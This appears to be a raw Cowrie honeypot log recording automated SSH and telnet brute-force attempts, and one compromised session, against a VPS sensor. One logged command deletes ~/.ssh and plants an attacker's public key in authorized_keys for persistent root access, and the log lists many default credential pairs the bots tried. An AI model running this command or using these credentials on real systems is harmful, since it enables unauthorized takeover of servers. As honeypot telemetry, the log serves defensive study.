{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:43:12.049590Z","src_ip":"213.6.203.226","session":"9dbdcc7cf98d"}
{"eventid":"cowrie.login.failed","username":"siteguru","password":"siteguru","message":"login attempt [siteguru/siteguru] failed","sensor":"my-vps","timestamp":"2025-09-09T05:43:12.333323Z","src_ip":"213.6.203.226","session":"9dbdcc7cf98d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:43:13.405301Z","src_ip":"213.6.203.226","session":"9dbdcc7cf98d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34034,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a8f470c05ef","protocol":"ssh","message":"New connection: 212.227.235.229:34034 (1.2.3.4:22) [session: 4a8f470c05ef]","sensor":"my-vps","timestamp":"2025-09-09T05:43:14.482714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:43:14.483587Z","src_ip":"212.227.235.229","session":"4a8f470c05ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:43:14.562637Z","src_ip":"212.227.235.229","session":"4a8f470c05ef"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Welcome1","message":"login attempt [postgres/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:43:14.916808Z","src_ip":"212.227.235.229","session":"4a8f470c05ef"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:43:15.997339Z","src_ip":"212.227.235.229","session":"4a8f470c05ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64217,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c30857afe6d","protocol":"ssh","message":"New connection: 212.227.235.229:64217 (1.2.3.4:22) [session: 7c30857afe6d]","sensor":"my-vps","timestamp":"2025-09-09T05:43:23.687704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:43:23.688992Z","src_ip":"212.227.235.229","session":"7c30857afe6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:43:23.820292Z","src_ip":"212.227.235.229","session":"7c30857afe6d"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:43:24.410021Z","src_ip":"212.227.235.229","session":"7c30857afe6d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:43:25.537638Z","src_ip":"212.227.235.229","session":"7c30857afe6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38792,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bc48698a134","protocol":"ssh","message":"New connection: 212.227.235.229:38792 (1.2.3.4:22) [session: 5bc48698a134]","sensor":"my-vps","timestamp":"2025-09-09T05:43:32.000042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:43:32.000959Z","src_ip":"212.227.235.229","session":"5bc48698a134"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:43:32.171291Z","src_ip":"212.227.235.229","session":"5bc48698a134"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@123","message":"login attempt [ubuntu/Admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:43:33.323698Z","src_ip":"212.227.235.229","session":"5bc48698a134"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:43:34.495771Z","src_ip":"212.227.235.229","session":"5bc48698a134"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":56348,"dst_ip":"1.2.3.4","dst_port":23,"session":"c73b34a915b0","protocol":"telnet","message":"New connection: 79.124.8.120:56348 (1.2.3.4:23) [session: c73b34a915b0]","sensor":"my-vps","timestamp":"2025-09-09T05:43:44.598526Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:43:44.639915Z","src_ip":"79.124.8.120","session":"c73b34a915b0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:43:44.661083Z","src_ip":"79.124.8.120","session":"c73b34a915b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36702,"dst_ip":"1.2.3.4","dst_port":22,"session":"3916ced4ac34","protocol":"ssh","message":"New connection: 212.227.235.229:36702 (1.2.3.4:22) [session: 3916ced4ac34]","sensor":"my-vps","timestamp":"2025-09-09T05:44:04.449878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:44:04.450849Z","src_ip":"212.227.235.229","session":"3916ced4ac34"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:44:04.698811Z","src_ip":"212.227.235.229","session":"3916ced4ac34"}
{"eventid":"cowrie.login.failed","username":"huser","password":"12345","message":"login attempt [huser/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T05:44:05.693216Z","src_ip":"212.227.235.229","session":"3916ced4ac34"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:06.944117Z","src_ip":"212.227.235.229","session":"3916ced4ac34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40688,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b9160a190a6","protocol":"ssh","message":"New connection: 212.227.235.229:40688 (1.2.3.4:22) [session: 1b9160a190a6]","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.035115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.035946Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.116450Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":12036,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ea6c9cc292a","protocol":"ssh","message":"New connection: 212.227.235.229:12036 (1.2.3.4:22) [session: 1ea6c9cc292a]","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.342449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.343049Z","src_ip":"212.227.235.229","session":"1ea6c9cc292a"}
{"eventid":"cowrie.login.success","username":"root","password":"1221","message":"login attempt [root/1221] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.483970Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.606488Z","src_ip":"212.227.235.229","session":"1ea6c9cc292a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:16.712034Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.712725Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.713448Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.795527Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:44:16.973657Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:44:16.974405Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:44:17.057017Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:17.057962Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40702,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4972727da0f","protocol":"ssh","message":"New connection: 212.227.235.229:40702 (1.2.3.4:22) [session: a4972727da0f]","sensor":"my-vps","timestamp":"2025-09-09T05:44:17.135568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:17.136557Z","src_ip":"212.227.235.229","session":"a4972727da0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:17.214817Z","src_ip":"212.227.235.229","session":"a4972727da0f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:44:17.570459Z","src_ip":"212.227.235.229","session":"a4972727da0f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:18.652711Z","src_ip":"212.227.235.229","session":"a4972727da0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40706,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d772a101989","protocol":"ssh","message":"New connection: 212.227.235.229:40706 (1.2.3.4:22) [session: 6d772a101989]","sensor":"my-vps","timestamp":"2025-09-09T05:44:18.730310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:44:18.730985Z","src_ip":"212.227.235.229","session":"6d772a101989"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:44:18.809793Z","src_ip":"212.227.235.229","session":"6d772a101989"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:44:19.164950Z","src_ip":"212.227.235.229","session":"6d772a101989"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:19.244697Z","src_ip":"212.227.235.229","session":"1b9160a190a6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:44:19.245804Z","src_ip":"212.227.235.229","session":"6d772a101989"}
